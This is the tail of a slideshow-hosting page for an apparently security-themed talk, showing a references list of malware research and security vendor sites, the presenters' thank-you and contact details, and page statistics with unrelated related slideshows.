http://www.symantec.com/
http://www.securelist.com/en/analysis
http://contagiodump.blogspot.com/
http://www.f-secure.com/
http://www.securelist.com/
http://www.secureworks.com/
http://en.wikipedia.org/
http://www.malwaredomainlist.com/
http://blogs.adobe.com/
http://blog.fireeye.com/
http://intrepidusgroup.com/
http://www.vupen.com
Thank you
Tamaghna Basu
[email protected]
twitter.com\titanlambda
tamahawk-techguru.blogspot.com
Ankur Bhargava
[email protected]
Tamaghna Basu
[email protected]
twitter.com\titanlambda
tamahawk-techguru.blogspot.com
Ankur Bhargava
[email protected]
Categories
TechnologyDownload
Download Slideshow Get the original presentation fileQuick Actions
Statistics
- Views 6,496
- Slides 77
- Favorites 4
- Age 5519 days
Related Slideshows
11
8-top-ai-courses-for-customer-support-representatives-in-2025.pptx
JeroenErne2
51 views
10
7-essential-ai-courses-for-call-center-supervisors-in-2025.pptx
JeroenErne2
49 views
13
25-essential-ai-courses-for-user-support-specialists-in-2025.pptx
JeroenErne2
39 views
11
8-essential-ai-courses-for-insurance-customer-service-representatives-in-2025.pptx
JeroenErne2
38 views
21
Know for Certain
DaveSinNM
24 views
17
PPT OPD LES 3ertt4t4tqqqe23e3e3rq2qq232.pptx
novasedanayoga46
27 views